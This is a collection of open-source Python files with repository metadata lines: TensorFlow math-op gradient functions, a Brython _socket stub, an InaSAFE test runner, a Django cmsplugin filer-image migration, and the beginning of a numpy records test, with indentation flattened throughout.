x = op.inputs[0]
q = op.inputs[1]
# Broadcast gradients
sx = array_ops.shape(x)
sq = array_ops.shape(q)
unused_rx, rq = gen_array_ops._broadcast_gradient_args(sx, sq)
# Evaluate gradient
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
q = math_ops.conj(q)
partial_q = -x * math_ops.zeta(x + 1, q)
# TODO(b/36815900): Mark None return values as NotImplemented
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_q * grad, rq), sq))
@ops.RegisterGradient("Polygamma")
def _PolygammaGrad(op, grad):
"""Returns gradient of psi(n, x) with respect to n and x."""
# TODO(tillahoffmann): Add derivative with respect to n
n = op.inputs[0]
x = op.inputs[1]
# Broadcast gradients
sn = array_ops.shape(n)
sx = array_ops.shape(x)
unused_rn, rx = gen_array_ops._broadcast_gradient_args(sn, sx)
# Evaluate gradient
with ops.control_dependencies([grad.op]):
n = math_ops.conj(n)
x = math_ops.conj(x)
partial_x = math_ops.polygamma(n + 1, x)
# TODO(b/36815900): Mark None return values as NotImplemented
return (None,
array_ops.reshape(math_ops.reduce_sum(partial_x * grad, rx), sx))
@ops.RegisterGradient("Sigmoid")
def _SigmoidGrad(op, grad):
"""Returns grad * sigmoid(x) * (1 - sigmoid(x))."""
y = op.outputs[0] # y = sigmoid(x)
with ops.control_dependencies([grad.op]):
y = math_ops.conj(y)
# pylint: disable=protected-access
return gen_math_ops._sigmoid_grad(y, grad)
@ops.RegisterGradient("SigmoidGrad")
def _SigmoidGradGrad(op, grad):
with ops.control_dependencies([grad.op]):
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
gb = grad * b
# pylint: disable=protected-access
return gb - 2.0 * gb * a, gen_math_ops._sigmoid_grad(a, grad)
@ops.RegisterGradient("Sign")
def _SignGrad(op, _):
"""Returns 0."""
x = op.inputs[0]
return array_ops.zeros(array_ops.shape(x), dtype=x.dtype)
@ops.RegisterGradient("Sin")
def _SinGrad(op, grad):
"""Returns grad * cos(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return grad * math_ops.cos(x)
@ops.RegisterGradient("Cos")
def _CosGrad(op, grad):
"""Returns grad * -sin(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
return -grad * math_ops.sin(x)
@ops.RegisterGradient("Tan")
def _TanGrad(op, grad):
"""Returns grad * 1/sec^2(x)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
secx = math_ops.reciprocal(math_ops.cos(x))
secx2 = math_ops.square(secx)
return grad * secx2
@ops.RegisterGradient("Asin")
def _AsinGrad(op, grad):
"""Returns grad * 1/sqrt(1-x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
den = math_ops.sqrt(math_ops.subtract(one, x2))
inv = math_ops.reciprocal(den)
return grad * inv
@ops.RegisterGradient("Acos")
def _AcosGrad(op, grad):
"""Returns grad * -1/sqrt(1-x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
den = math_ops.sqrt(math_ops.subtract(one, x2))
inv = math_ops.reciprocal(den)
return -grad * inv
@ops.RegisterGradient("Atan")
def _AtanGrad(op, grad):
"""Returns grad * 1/ (1 + x^2)."""
x = op.inputs[0]
with ops.control_dependencies([grad.op]):
x = math_ops.conj(x)
x2 = math_ops.square(x)
one = constant_op.constant(1, dtype=grad.dtype)
inv = math_ops.reciprocal(math_ops.add(one, x2))
return grad * inv
@ops.RegisterGradient("Atan2")
def _Atan2Grad(op, grad):
"""Returns grad * x / (x^2 + y^2), grad * -y / (x^2 + y^2)."""
y = op.inputs[0]
x = op.inputs[1]
with ops.control_dependencies([grad.op]):
grad_inv = grad / (math_ops.square(x) + math_ops.square(y))
return x * grad_inv, -y * grad_inv
@ops.RegisterGradient("AddN")
def _AddNGrad(op, grad):
"""Copies the gradient to all inputs."""
# Not broadcasting.
return [grad] * len(op.inputs)
@ops.RegisterGradient("Add")
def _AddGrad(op, grad):
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(grad, rx), sx),
array_ops.reshape(math_ops.reduce_sum(grad, ry), sy))
@ops.RegisterGradient("Sub")
def _SubGrad(op, grad):
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(grad, rx), sx),
array_ops.reshape(-math_ops.reduce_sum(grad, ry), sy))
@ops.RegisterGradient("Mul")
def _MulGrad(op, grad):
"""The gradient of scalar multiplication."""
x = op.inputs[0]
y = op.inputs[1]
assert x.dtype.base_dtype == y.dtype.base_dtype, (x.dtype, " vs. ", y.dtype)
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(math_ops.reduce_sum(grad * y, rx), sx),
array_ops.reshape(math_ops.reduce_sum(x * grad, ry), sy))
@ops.RegisterGradient("Div")
def _DivGrad(op, grad):
"""The gradient for the Div operator."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
# pylint: disable=protected-access
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
# pylint: enable=protected-access
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(math_ops.reduce_sum(math_ops.div(grad, y), rx), sx),
array_ops.reshape(
math_ops.reduce_sum(grad * math_ops.div(math_ops.div(-x, y), y),
ry), sy))
@ops.RegisterGradient("FloorDiv")
def _FloorDivGrad(_, unused_grad):
"""The gradient for the FloorDiv operator."""
return None, None
@ops.RegisterGradient("TruncateDiv")
def _TruncateDivGrad(_, unused_grad):
return None, None
@ops.RegisterGradient("RealDiv")
def _RealDivGrad(op, grad):
"""RealDiv op gradient."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
# pylint: disable=protected-access
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
# pylint: enable=protected-access
x = math_ops.conj(x)
y = math_ops.conj(y)
return (array_ops.reshape(
math_ops.reduce_sum(math_ops.realdiv(grad, y), rx),
sx), array_ops.reshape(
math_ops.reduce_sum(grad * math_ops.realdiv(math_ops.realdiv(-x, y), y),
ry), sy))
@ops.RegisterGradient("Pow")
def _PowGrad(op, grad):
"""Returns grad * (y*x^(y-1), z*log(x))."""
x = op.inputs[0]
y = op.inputs[1]
z = op.outputs[0]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
x = math_ops.conj(x)
y = math_ops.conj(y)
z = math_ops.conj(z)
gx = array_ops.reshape(
math_ops.reduce_sum(grad * y * math_ops.pow(x, y - 1), rx), sx)
# Avoid false singularity at x = 0
if x.dtype.is_complex:
# real(x) < 0 is fine for the complex case
log_x = array_ops.where(
math_ops.not_equal(x, 0), math_ops.log(x), array_ops.zeros_like(x))
else:
# There's no sensible real value to return if x < 0, so return 0
log_x = array_ops.where(x > 0, math_ops.log(x), array_ops.zeros_like(x))
gy = array_ops.reshape(math_ops.reduce_sum(grad * z * log_x, ry), sy)
return gx, gy
def _MaximumMinimumGrad(op, grad, selector_op):
"""Factor out the code for the gradient of Maximum or Minimum."""
x = op.inputs[0]
y = op.inputs[1]
gdtype = grad.dtype
sx = array_ops.shape(x)
sy = array_ops.shape(y)
gradshape = array_ops.shape(grad)
zeros = array_ops.zeros(gradshape, gdtype)
xmask = selector_op(x, y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
xgrad = array_ops.where(xmask, grad, zeros)
ygrad = array_ops.where(math_ops.logical_not(xmask), grad, zeros)
gx = array_ops.reshape(math_ops.reduce_sum(xgrad, rx), sx)
gy = array_ops.reshape(math_ops.reduce_sum(ygrad, ry), sy)
return (gx, gy)
@ops.RegisterGradient("Maximum")
def _MaximumGrad(op, grad):
"""Returns grad*(x > y, x <= y) with type of grad."""
return _MaximumMinimumGrad(op, grad, math_ops.greater_equal)
@ops.RegisterGradient("Minimum")
def _MinimumGrad(op, grad):
"""Returns grad*(x < y, x >= y) with type of grad."""
return _MaximumMinimumGrad(op, grad, math_ops.less_equal)
@ops.RegisterGradient("SquaredDifference")
def _SquaredDifferenceGrad(op, grad):
"""Returns the gradient for (x-y)^2."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
# pylint: disable=protected-access
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
# pylint: enable=protected-access
# .op works with Tensors or IndexedSlices
with ops.control_dependencies([grad.op]):
# The parens ensure that if grad is IndexedSlices, it'll get multiplied by
# Tensor (not a number like 2.0) which causes it to convert to Tensor.
x_grad = math_ops.scalar_mul(2.0, grad) * (x - y)
return (array_ops.reshape(math_ops.reduce_sum(x_grad, rx), sx),
-array_ops.reshape(math_ops.reduce_sum(x_grad, ry), sy))
# Logical operations have no gradients.
ops.NotDifferentiable("Less")
ops.NotDifferentiable("LessEqual")
ops.NotDifferentiable("Greater")
ops.NotDifferentiable("GreaterEqual")
ops.NotDifferentiable("Equal")
ops.NotDifferentiable("ApproximateEqual")
ops.NotDifferentiable("NotEqual")
ops.NotDifferentiable("LogicalAnd")
ops.NotDifferentiable("LogicalOr")
ops.NotDifferentiable("LogicalNot")
@ops.RegisterGradient("Select")
def _SelectGrad(op, grad):
c = op.inputs[0]
x = op.inputs[1]
zeros = array_ops.zeros_like(x)
return (None, array_ops.where(c, grad, zeros),
array_ops.where(c, zeros, grad))
@ops.RegisterGradient("MatMul")
def _MatMulGrad(op, grad):
"""Gradient for MatMul."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
a = math_ops.conj(op.inputs[0])
b = math_ops.conj(op.inputs[1])
if not t_a and not t_b:
grad_a = math_ops.matmul(grad, b, transpose_b=True)
grad_b = math_ops.matmul(a, grad, transpose_a=True)
elif not t_a and t_b:
grad_a = math_ops.matmul(grad, b)
grad_b = math_ops.matmul(grad, a, transpose_a=True)
elif t_a and not t_b:
grad_a = math_ops.matmul(b, grad, transpose_b=True)
grad_b = math_ops.matmul(a, grad)
elif t_a and t_b:
grad_a = math_ops.matmul(b, grad, transpose_a=True, transpose_b=True)
grad_b = math_ops.matmul(grad, a, transpose_a=True, transpose_b=True)
return grad_a, grad_b
@ops.RegisterGradient("SparseMatMul")
def _SparseMatMulGrad(op, grad):
"""Gradient for SparseMatMul."""
t_a = op.get_attr("transpose_a")
t_b = op.get_attr("transpose_b")
is_sparse = {
op.inputs[0]: op.get_attr("a_is_sparse"),
op.inputs[1]: op.get_attr("b_is_sparse"),
# Use heuristic to figure out if grad might be sparse
grad: (grad.op.type == "ReluGrad")
}
def _SparseMatMul(t1, t2, out_dtype, transpose_a=False, transpose_b=False):
"""Helper function to create SparseMatMul op."""
assert t1 in is_sparse and t2 in is_sparse
t1_sparse = is_sparse[t1]
t2_sparse = is_sparse[t2]
if transpose_b:
t2 = array_ops.transpose(t2)
transpose_b = False
prod = math_ops.matmul(
t1,
t2,
transpose_a=transpose_a,
transpose_b=transpose_b,
a_is_sparse=t1_sparse,
b_is_sparse=t2_sparse)
if prod.dtype != out_dtype:
prod = math_ops.cast(prod, out_dtype)
return prod
dtype_a = op.inputs[0].dtype
dtype_b = op.inputs[1].dtype
if not t_a and not t_b:
return (_SparseMatMul(
grad, op.inputs[1], dtype_a, transpose_b=True), _SparseMatMul(
op.inputs[0], grad, dtype_b, transpose_a=True))
elif not t_a and t_b:
return (_SparseMatMul(grad, op.inputs[1], dtype_a), _SparseMatMul(
grad, op.inputs[0], dtype_b, transpose_a=True))
elif t_a and not t_b:
return (_SparseMatMul(
op.inputs[1], grad, dtype_a, transpose_b=True),
_SparseMatMul(op.inputs[0], grad, dtype_b))
elif t_a and t_b:
return (_SparseMatMul(
op.inputs[1], grad, dtype_a, transpose_a=True,
transpose_b=True), _SparseMatMul(
grad, op.inputs[0], dtype_b, transpose_a=True, transpose_b=True))
@ops.RegisterGradient("Floor")
def _FloorGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Ceil")
def _CeilGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Round")
def _RoundGrad(_, unused_grad):
return [None]
@ops.RegisterGradient("Rint")
def _RintGrad(_, unused_grad):
# the gradient of Rint is zero
return [None]
@ops.RegisterGradient("BatchMatMul")
def _BatchMatMul(op, grad):
"""Returns the gradient of x and y given the gradient of x * y."""
x = op.inputs[0]
y = op.inputs[1]
adj_x = op.get_attr("adj_x")
adj_y = op.get_attr("adj_y")
if not adj_x:
if not adj_y:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=True, adjoint_b=False)
else:
grad_x = math_ops.matmul(grad, y, adjoint_a=False, adjoint_b=False)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=False)
else:
if not adj_y:
grad_x = math_ops.matmul(y, grad, adjoint_a=False, adjoint_b=True)
grad_y = math_ops.matmul(x, grad, adjoint_a=False, adjoint_b=False)
else:
grad_x = math_ops.matmul(y, grad, adjoint_a=True, adjoint_b=True)
grad_y = math_ops.matmul(grad, x, adjoint_a=True, adjoint_b=True)
return grad_x, grad_y
ops.NotDifferentiable("Range")
ops.NotDifferentiable("LinSpace")
@ops.RegisterGradient("Complex")
def _ComplexGrad(op, grad):
"""Returns the real and imaginary components of 'grad', respectively."""
x = op.inputs[0]
y = op.inputs[1]
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops._broadcast_gradient_args(sx, sy)
return (array_ops.reshape(math_ops.reduce_sum(math_ops.real(grad), rx), sx),
array_ops.reshape(math_ops.reduce_sum(math_ops.imag(grad), ry), sy))
@ops.RegisterGradient("Real")
def _RealGrad(_, grad):
"""Returns 'grad' as the real part and set the imaginary part 0."""
zero = constant_op.constant(0, dtype=grad.dtype)
return math_ops.complex(grad, zero)
@ops.RegisterGradient("Imag")
def _ImagGrad(_, grad):
"""Returns 'grad' as the imaginary part and set the real part 0."""
zero = constant_op.constant(0, dtype=grad.dtype)
return math_ops.complex(zero, grad)
@ops.RegisterGradient("Conj")
def _ConjGrad(_, grad):
"""Returns the complex conjugate of grad."""
return math_ops.conj(grad)
@ops.RegisterGradient("ComplexAbs")
def _ComplexAbsGrad(op, grad):
"""Returns the gradient of ComplexAbs."""
# TODO(b/27786104): The cast to complex could be removed once arithmetic
# supports mixtures of complex64 and real values.
return (math_ops.complex(grad, array_ops.zeros_like(grad)) *
math_ops.sign(op.inputs[0]))
@ops.RegisterGradient("Cast")
def _CastGrad(op, grad):
t = [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.bfloat16,
dtypes.complex64, dtypes.complex128
]
src_type = op.inputs[0].dtype.base_dtype
dst_type = grad.dtype.base_dtype
if src_type in t and dst_type in t:
return math_ops.cast(grad, src_type)
else:
return None
@ops.RegisterGradient("Cross")
def _CrossGrad(op, grad):
u = op.inputs[0]
v = op.inputs[1]
return (math_ops.cross(v, grad), math_ops.cross(grad, u))
@ops.RegisterGradient("Cumsum")
def _CumsumGrad(op, grad):
axis = op.inputs[1]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
return [
math_ops.cumsum(
grad, axis, exclusive=exclusive, reverse=not reverse), None
]
@ops.RegisterGradient("Cumprod")
def _CumprodGrad(op, grad):
x = op.inputs[0]
axis = op.inputs[1]
exclusive = op.get_attr("exclusive")
reverse = op.get_attr("reverse")
# TODO This fails when x contains 0 and should be fixed
prod = math_ops.cumprod(x, axis, exclusive=exclusive, reverse=reverse)
out = math_ops.cumsum(
prod * grad, axis, exclusive=exclusive, reverse=not reverse)
return [out / x, None]
| apache-2.0 | -7,581,199,566,476,697,000 | 31.39751 | 88 | 0.659551 | false |
40223249-1/2015cd_midterm2 | static/Brython3.1.1-20150328-091302/Lib/_socket.py | 742 | 6431 | """Implementation module for socket operations.
See the socket module for documentation."""
AF_APPLETALK = 16
AF_DECnet = 12
AF_INET = 2
AF_INET6 = 23
AF_IPX = 6
AF_IRDA = 26
AF_SNA = 11
AF_UNSPEC = 0
AI_ADDRCONFIG = 1024
AI_ALL = 256
AI_CANONNAME = 2
AI_NUMERICHOST = 4
AI_NUMERICSERV = 8
AI_PASSIVE = 1
AI_V4MAPPED = 2048
CAPI = '<capsule object "_socket.CAPI" at 0x00BC4F38>'
EAI_AGAIN = 11002
EAI_BADFLAGS = 10022
EAI_FAIL = 11003
EAI_FAMILY = 10047
EAI_MEMORY = 8
EAI_NODATA = 11001
EAI_NONAME = 11001
EAI_SERVICE = 10109
EAI_SOCKTYPE = 10044
INADDR_ALLHOSTS_GROUP = -536870911
INADDR_ANY = 0
INADDR_BROADCAST = -1
INADDR_LOOPBACK = 2130706433
INADDR_MAX_LOCAL_GROUP = -536870657
INADDR_NONE = -1
INADDR_UNSPEC_GROUP = -536870912
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IPPROTO_ICMP = 1
IPPROTO_IP = 0
IPPROTO_RAW = 255
IPPROTO_TCP = 6
IPPROTO_UDP = 17
IPV6_CHECKSUM = 26
IPV6_DONTFRAG = 14
IPV6_HOPLIMIT = 21
IPV6_HOPOPTS = 1
IPV6_JOIN_GROUP = 12
IPV6_LEAVE_GROUP = 13
IPV6_MULTICAST_HOPS = 10
IPV6_MULTICAST_IF = 9
IPV6_MULTICAST_LOOP = 11
IPV6_PKTINFO = 19
IPV6_RECVRTHDR = 38
IPV6_RECVTCLASS = 40
IPV6_RTHDR = 32
IPV6_TCLASS = 39
IPV6_UNICAST_HOPS = 4
IPV6_V6ONLY = 27
IP_ADD_MEMBERSHIP = 12
IP_DROP_MEMBERSHIP = 13
IP_HDRINCL = 2
IP_MULTICAST_IF = 9
IP_MULTICAST_LOOP = 11
IP_MULTICAST_TTL = 10
IP_OPTIONS = 1
IP_RECVDSTADDR = 25
IP_TOS = 3
IP_TTL = 4
MSG_BCAST = 1024
MSG_CTRUNC = 512
MSG_DONTROUTE = 4
MSG_MCAST = 2048
MSG_OOB = 1
MSG_PEEK = 2
MSG_TRUNC = 256
NI_DGRAM = 16
NI_MAXHOST = 1025
NI_MAXSERV = 32
NI_NAMEREQD = 4
NI_NOFQDN = 1
NI_NUMERICHOST = 2
NI_NUMERICSERV = 8
RCVALL_MAX = 3
RCVALL_OFF = 0
RCVALL_ON = 1
RCVALL_SOCKETLEVELONLY = 2
SHUT_RD = 0
SHUT_RDWR = 2
SHUT_WR = 1
SIO_KEEPALIVE_VALS = 2550136836
SIO_RCVALL = 2550136833
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
SOCK_STREAM = 1
SOL_IP = 0
SOL_SOCKET = 65535
SOL_TCP = 6
SOL_UDP = 17
SOMAXCONN = 2147483647
SO_ACCEPTCONN = 2
SO_BROADCAST = 32
SO_DEBUG = 1
SO_DONTROUTE = 16
SO_ERROR = 4103
SO_EXCLUSIVEADDRUSE = -5
SO_KEEPALIVE = 8
SO_LINGER = 128
SO_OOBINLINE = 256
SO_RCVBUF = 4098
SO_RCVLOWAT = 4100
SO_RCVTIMEO = 4102
SO_REUSEADDR = 4
SO_SNDBUF = 4097
SO_SNDLOWAT = 4099
SO_SNDTIMEO = 4101
SO_TYPE = 4104
SO_USELOOPBACK = 64
class SocketType:
pass
TCP_MAXSEG = 4
TCP_NODELAY = 1
__loader__ = '<_frozen_importlib.ExtensionFileLoader object at 0x00CA2D90>'
def dup(*args,**kw):
"""dup(integer) -> integer
Duplicate an integer socket file descriptor. This is like os.dup(), but for
sockets; on some platforms os.dup() won't work for socket file descriptors."""
pass
class error:
pass
class gaierror:
pass
def getaddrinfo(*args,**kw):
"""getaddrinfo(host, port [, family, socktype, proto, flags]) -> list of (family, socktype, proto, canonname, sockaddr)
Resolve host and port into addrinfo struct."""
pass
def getdefaulttimeout(*args,**kw):
"""getdefaulttimeout() -> timeout
Returns the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
def gethostbyaddr(*args,**kw):
"""gethostbyaddr(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostbyname(*args,**kw):
"""gethostbyname(host) -> address
Return the IP address (a string of the form '255.255.255.255') for a host."""
pass
def gethostbyname_ex(*args,**kw):
"""gethostbyname_ex(host) -> (name, aliaslist, addresslist)
Return the true host name, a list of aliases, and a list of IP addresses,
for a host. The host argument is a string giving a host name or IP number."""
pass
def gethostname(*args,**kw):
"""gethostname() -> string
Return the current host name."""
pass
def getnameinfo(*args,**kw):
"""getnameinfo(sockaddr, flags) --> (host, port)
Get host and port for a sockaddr."""
pass
def getprotobyname(*args,**kw):
"""getprotobyname(name) -> integer
Return the protocol number for the named protocol. (Rarely used.)"""
pass
def getservbyname(*args,**kw):
"""getservbyname(servicename[, protocolname]) -> integer
Return a port number from a service name and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
def getservbyport(*args,**kw):
"""getservbyport(port[, protocolname]) -> string
Return the service name from a port number and protocol name.
The optional protocol name, if given, should be 'tcp' or 'udp',
otherwise any protocol will match."""
pass
has_ipv6 = True
class herror:
pass
def htonl(*args,**kw):
"""htonl(integer) -> integer
Convert a 32-bit integer from host to network byte order."""
pass
def htons(*args,**kw):
"""htons(integer) -> integer
Convert a 16-bit integer from host to network byte order."""
pass
def inet_aton(*args,**kw):
"""inet_aton(string) -> bytes giving packed 32-bit IP representation
Convert an IP address in string format (123.45.67.89) to the 32-bit packed
binary format used in low-level network functions."""
pass
def inet_ntoa(*args,**kw):
"""inet_ntoa(packed_ip) -> ip_address_string
Convert an IP address from 32-bit packed binary format to string format"""
pass
def ntohl(*args,**kw):
"""ntohl(integer) -> integer
Convert a 32-bit integer from network to host byte order."""
pass
def ntohs(*args,**kw):
"""ntohs(integer) -> integer
Convert a 16-bit integer from network to host byte order."""
pass
def setdefaulttimeout(*args,**kw):
"""setdefaulttimeout(timeout)
Set the default timeout in seconds (float) for new socket objects.
A value of None indicates that new socket objects have no timeout.
When the socket module is first imported, the default is None."""
pass
class socket:
def __init__(self,*args,**kw):
pass
def bind(self,*args,**kw):
pass
def close(self):
pass
class timeout:
pass
| agpl-3.0 | 1,789,140,905,586,452,700 | 16.381081 | 130 | 0.665837 | false |
AIFDR/inasafe | test_suite.py | 3 | 3260 | # coding=utf-8
"""
Test Suite for InaSAFE.
Contact : etienne at kartoza dot com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import sys
import os
import unittest
import qgis # NOQA For SIP API to V2 if run outside of QGIS
try:
from pip import main as pipmain
except:
from pip._internal import main as pipmain
try:
import coverage
except ImportError:
pipmain(['install', 'coverage'])
import coverage
import tempfile
from osgeo import gdal
from qgis.PyQt import Qt
from safe.utilities.gis import qgis_version
__author__ = 'etiennetrimaille'
__revision__ = '$Format:%H$'
__date__ = '14/06/2016'
__copyright__ = (
'Copyright 2012, Australia Indonesia Facility for Disaster Reduction')
def _run_tests(test_suite, package_name, with_coverage=False):
"""Core function to test a test suite."""
count = test_suite.countTestCases()
print('########')
print('%s tests has been discovered in %s' % (count, package_name))
print('QGIS : %s' % qgis_version())
print('Python GDAL : %s' % gdal.VersionInfo('VERSION_NUM'))
print('QT : %s' % Qt.QT_VERSION_STR)
print('Run slow tests : %s' % (not os.environ.get('ON_TRAVIS', False)))
print('########')
if with_coverage:
cov = coverage.Coverage(
source=['safe/'],
omit=['*/test/*', 'safe/definitions/*'],
)
cov.start()
unittest.TextTestRunner(verbosity=3, stream=sys.stdout).run(test_suite)
if with_coverage:
cov.stop()
cov.save()
report = tempfile.NamedTemporaryFile(delete=False)
cov.report(file=report)
# Produce HTML reports in the `htmlcov` folder and open index.html
# cov.html_report()
report.close()
with open(report.name, 'r') as fin:
print(fin.read())
def test_package(package='safe'):
"""Test package.
This function is called by travis without arguments.
:param package: The package to test.
:type package: str
"""
test_loader = unittest.defaultTestLoader
try:
test_suite = test_loader.discover(package)
except ImportError:
test_suite = unittest.TestSuite()
_run_tests(test_suite, package)
def test_environment():
"""Test package with an environment variable."""
package = os.environ.get('TESTING_PACKAGE', 'safe')
test_loader = unittest.defaultTestLoader
test_suite = test_loader.discover(package)
_run_tests(test_suite, package)
def test_manually():
"""Test manually a test class.
You can change this function as much as you want.
"""
from safe.test.test_init import TestInit
test_suite = unittest.makeSuite(TestInit, 'test')
_run_tests(test_suite, 'custom test class')
def test_one():
"""Run a single test"""
from safe.gui.tools.test.test_extent_selector import ExtentSelectorTest
test_runner = unittest.TextTestRunner(verbosity=3, stream=sys.stdout)
test_runner.run(unittest.makeSuite(ExtentSelectorTest, 'test'))
if __name__ == '__main__':
test_package()
| gpl-3.0 | 7,030,695,755,003,612,000 | 27.849558 | 78 | 0.657362 | false |
Venturi/oldcms | env/lib/python2.7/site-packages/cmsplugin_filer_image/migrations_django/0001_initial.py | 8 | 4643 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import filer.fields.file
import filer.fields.image
import cms.models.fields
class Migration(migrations.Migration):
dependencies = [
('cms', '0003_auto_20140926_2347'),
('filer', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FilerImage',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('style', models.CharField(max_length=50, verbose_name='Style', default=settings.CMSPLUGIN_FILER_IMAGE_DEFAULT_STYLE, blank=True, choices=settings.CMSPLUGIN_FILER_IMAGE_STYLE_CHOICES)),
('caption_text', models.CharField(max_length=255, null=True, verbose_name='caption text', blank=True)),
('image_url', models.URLField(default=None, null=True, verbose_name='alternative image url', blank=True)),
('alt_text', models.CharField(max_length=255, null=True, verbose_name='alt text', blank=True)),
('use_original_image', models.BooleanField(default=False, help_text='do not resize the image. use the original image instead.', verbose_name='use the original image')),
('use_autoscale', models.BooleanField(default=False, help_text='tries to auto scale the image based on the placeholder context', verbose_name='use automatic scaling')),
('width', models.PositiveIntegerField(null=True, verbose_name='width', blank=True)),
('height', models.PositiveIntegerField(null=True, verbose_name='height', blank=True)),
('crop', models.BooleanField(default=True, verbose_name='crop')),
('upscale', models.BooleanField(default=True, verbose_name='upscale')),
('alignment', models.CharField(blank=True, max_length=10, null=True, verbose_name='image alignment', choices=[('left', 'left'), ('right', 'right')])),
('free_link', models.CharField(help_text='if present image will be clickable', max_length=255, null=True, verbose_name='link', blank=True)),
('original_link', models.BooleanField(default=False, help_text='if present image will be clickable', verbose_name='link original image')),
('description', models.TextField(null=True, verbose_name='description', blank=True)),
('target_blank', models.BooleanField(default=False, verbose_name='Open link in new window')),
('file_link', filer.fields.file.FilerFileField(related_name='+', default=None, to='filer.File', blank=True, help_text='if present image will be clickable', null=True, verbose_name='file link')),
('image', filer.fields.image.FilerImageField(default=None, blank=True, to='filer.Image', null=True, verbose_name='image')),
('page_link', cms.models.fields.PageField(blank=True, to='cms.Page', help_text='if present image will be clickable', null=True, verbose_name='page link')),
],
options={
'verbose_name': 'filer image',
'verbose_name_plural': 'filer images',
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='ThumbnailOption',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100, verbose_name='name')),
('width', models.IntegerField(help_text='width in pixel.', verbose_name='width')),
('height', models.IntegerField(help_text='height in pixel.', verbose_name='height')),
('crop', models.BooleanField(default=True, verbose_name='crop')),
('upscale', models.BooleanField(default=True, verbose_name='upscale')),
],
options={
'ordering': ('width', 'height'),
'verbose_name': 'thumbnail option',
'verbose_name_plural': 'thumbnail options',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='filerimage',
name='thumbnail_option',
field=models.ForeignKey(blank=True, to='cmsplugin_filer_image.ThumbnailOption', help_text='overrides width, height, crop and upscale with values from the selected thumbnail option', null=True, verbose_name='thumbnail option'),
preserve_default=True,
),
]
| apache-2.0 | 2,109,889,139,699,377,700 | 64.394366 | 238 | 0.622012 | false |
jschueller/numpy | numpy/core/tests/test_records.py | 42 | 11668 | from __future__ import division, absolute_import, print_function
import sys
import collections
import pickle
from os import path
import numpy as np
from numpy.compat import asbytes
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_raises
)
class TestFromrecords(TestCase):
def test_fromrecords(self):
r = np.rec.fromrecords([[456, 'dbe', 1.2], [2, 'de', 1.3]],
names='col1,col2,col3')
assert_equal(r[0].item(), (456, 'dbe', 1.2))
assert_equal(r['col1'].dtype.kind, 'i')
if sys.version_info[0] >= 3:
assert_equal(r['col2'].dtype.kind, 'U')
assert_equal(r['col2'].dtype.itemsize, 12)
else:
assert_equal(r['col2'].dtype.kind, 'S')
assert_equal(r['col2'].dtype.itemsize, 3)
assert_equal(r['col3'].dtype.kind, 'f')
def test_method_array(self):
r = np.rec.array(asbytes('abcdefg') * 100, formats='i2,a3,i4', shape=3, byteorder='big')
